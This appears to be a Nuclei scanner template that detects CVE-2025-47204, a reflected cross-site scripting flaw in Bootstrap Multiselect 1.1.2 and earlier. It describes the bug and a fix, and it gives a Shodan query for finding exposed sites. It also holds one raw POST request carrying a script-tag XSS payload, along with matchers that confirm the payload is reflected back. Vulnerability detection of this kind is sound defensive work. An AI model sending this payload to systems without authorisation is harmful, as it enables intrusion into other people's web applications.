id: CVE-2025-47204

info:
  name: Bootstrap Multiselect <= 1.1.2 - Cross-Site Scripting
  author: r3naissance
  severity: medium
  description: |
    A PHP script in the source code release echoes arbitrary POST data. If a developer adopts this structure wholesale in a live application, it could create a Reflective Cross-Site Scripting (XSS) vulnerability exploitable through Cross-Site Request Forgery (CSRF).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Only use the necessary components (css/js) in production applications
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47204
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"bootstrap-multiselect"
  tags: cve,cve2025,xss,bootstrap-multiselect

http:
  - raw:
      - |
        POST /bootstrap-multiselect/post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        canary="><script>alert(document.domain)</script>

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "bootstrap-multiselect-master")'
        condition: and
# digest: 4a0a0047304502206f11f91aabab074e45b181b94383dce9e5261fd85dc1d7f2850b90723818897e022100c671a89477c49418c49c0af6be1a341ad1158f6ff9c1a4f5303feb2e1a06c968:922c64590222798bb761d5b6d8e72950